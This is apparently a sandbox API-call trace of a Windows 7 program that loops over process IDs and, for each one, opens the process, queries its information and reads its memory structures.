[0412.593] malloc (_Size=0x72) returned 0x2c1680
[0412.593] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x462750, lpBuffer=0x2c1680, nSize=0x70, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c1680*, lpNumberOfBytesRead=0x0) returned 1
[0412.593] free (_Block=0x2c1680)
[0412.594] CloseHandle (hObject=0x24c) returned 1
[0412.595] _ui64tow (_Value=0xa24, _Buffer="2584", _Radix=10) returned="2596"
[0412.599] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2596") returned 4
[0412.600] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0412.600] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0412.626] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa24) returned 0x24c
[0412.626] GetLastError () returned 0x0
[0412.626] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0412.626] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.627] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0412.627] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4c28e0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.627] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4c26e4, lpBuffer=0x12dd100, nSize=0x58, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0412.628] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0412.629] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0412.629] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.629] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4c1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0412.630] malloc (_Size=0x60) returned 0x2c0790
[0412.630] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4c273c, lpBuffer=0x2c0790, nSize=0x5e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c0790*, lpNumberOfBytesRead=0x0) returned 1
[0412.630] free (_Block=0x2c0790)
[0412.631] CloseHandle (hObject=0x24c) returned 1
[0412.632] _ui64tow (_Value=0xa2c, _Buffer="2596", _Radix=10) returned="2604"
[0412.636] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2604") returned 4
[0412.637] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0412.637] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0412.704] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa2c) returned 0x24c
[0412.704] GetLastError () returned 0x0
[0412.704] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0412.705] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.705] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0412.705] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x202950, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.705] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x2026f0, lpBuffer=0x12dd100, nSize=0x7a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0412.706] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0412.708] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0412.708] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.708] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x201ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0412.708] malloc (_Size=0x82) returned 0x2e3b90
[0412.708] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x20276a, lpBuffer=0x2e3b90, nSize=0x80, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2e3b90*, lpNumberOfBytesRead=0x0) returned 1
[0412.708] free (_Block=0x2e3b90)
[0412.709] CloseHandle (hObject=0x24c) returned 1
[0412.711] _ui64tow (_Value=0xbb4, _Buffer="2604", _Radix=10) returned="2996"
[0412.715] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2996") returned 4
[0412.716] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0412.716] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0412.739] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbb4) returned 0x24c
[0412.739] GetLastError () returned 0x0
[0412.740] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0412.740] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.740] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0412.740] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0xd2910, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.740] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0xd26f2, lpBuffer=0x12dd100, nSize=0x64, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0412.742] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0412.743] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0412.743] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.743] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0xd1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0412.743] malloc (_Size=0x6c) returned 0x2c1680
[0412.743] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0xd2756, lpBuffer=0x2c1680, nSize=0x6a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c1680*, lpNumberOfBytesRead=0x0) returned 1
[0412.744] free (_Block=0x2c1680)
[0412.744] CloseHandle (hObject=0x24c) returned 1
[0412.745] _ui64tow (_Value=0xbbc, _Buffer="2996", _Radix=10) returned="3004"
[0412.750] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="3004") returned 4
[0412.751] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1243f4, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0412.751] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0412.777] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbbc) returned 0x24c
[0412.778] GetLastError () returned 0x0
[0412.778] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0412.778] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.778] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0412.778] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x572900, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.778] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x5726ee, lpBuffer=0x12dd100, nSize=0x60, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0412.779] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0412.781] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0412.781] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.781] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x571ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0412.781] malloc (_Size=0x68) returned 0x2c0800
[0412.781] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x57274e, lpBuffer=0x2c0800, nSize=0x66, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c0800*, lpNumberOfBytesRead=0x0) returned 1
[0412.781] free (_Block=0x2c0800)
[0412.782] CloseHandle (hObject=0x24c) returned 1
[0412.783] _ui64tow (_Value=0xbc4, _Buffer="3004", _Radix=10) returned="3012"
[0412.787] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="3012") returned 4
[0412.789] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1243f4, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0412.789] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0412.809] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbc4) returned 0x24c
[0412.809] GetLastError () returned 0x0
[0412.810] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0412.810] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.810] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0412.810] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x432910, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.810] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4326e4, lpBuffer=0x12dd100, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0412.811] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0412.812] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0412.813] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.813] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x431ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0412.813] malloc (_Size=0x70) returned 0x2c1680
[0412.813] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x43274c, lpBuffer=0x2c1680, nSize=0x6e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c1680*, lpNumberOfBytesRead=0x0) returned 1
[0412.813] free (_Block=0x2c1680)
[0412.814] CloseHandle (hObject=0x24c) returned 1
[0412.815] _ui64tow (_Value=0xbcc, _Buffer="3012", _Radix=10) returned="3020"
[0412.819] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="3020") returned 4
[0412.820] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0412.820] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0412.841] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbcc) returned 0x24c
[0412.841] GetLastError () returned 0x0
[0412.841] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0412.841] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.842] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0412.842] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x3f2900, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.842] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x3f26ee, lpBuffer=0x12dd100, nSize=0x60, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0412.843] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0412.844] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0412.844] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.844] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x3f1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0412.845] malloc (_Size=0x68) returned 0x2c0800
[0412.845] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x3f274e, lpBuffer=0x2c0800, nSize=0x66, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c0800*, lpNumberOfBytesRead=0x0) returned 1
[0412.845] free (_Block=0x2c0800)
[0412.846] CloseHandle (hObject=0x24c) returned 1
[0412.846] _ui64tow (_Value=0xbd4, _Buffer="3020", _Radix=10) returned="3028"
[0412.851] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="3028") returned 4
[0412.852] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1243a4, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0412.852] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0412.879] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbd4) returned 0x24c
[0412.879] GetLastError () returned 0x0
[0412.879] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0412.879] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.879] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0412.880] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x1328f0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.880] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x1326e8, lpBuffer=0x12dd100, nSize=0x5a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0412.881] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0412.882] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0412.882] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.883] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x131ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0412.883] malloc (_Size=0x62) returned 0x2c0790
[0412.883] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x132742, lpBuffer=0x2c0790, nSize=0x60, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c0790*, lpNumberOfBytesRead=0x0) returned 1
[0412.883] free (_Block=0x2c0790)
[0412.884] CloseHandle (hObject=0x24c) returned 1
[0412.885] _ui64tow (_Value=0xbdc, _Buffer="3028", _Radix=10) returned="3036"
[0412.889] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="3036") returned 4
[0412.891] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0412.891] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0412.914] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbdc) returned 0x24c
[0412.914] GetLastError () returned 0x0
[0412.914] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0412.914] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.915] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0412.915] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x502930, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.915] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x5026f4, lpBuffer=0x12dd100, nSize=0x6c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0412.916] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0412.917] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0412.917] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.917] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x501ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0412.918] malloc (_Size=0x74) returned 0x2c1680
[0412.918] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x502760, lpBuffer=0x2c1680, nSize=0x72, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c1680*, lpNumberOfBytesRead=0x0) returned 1
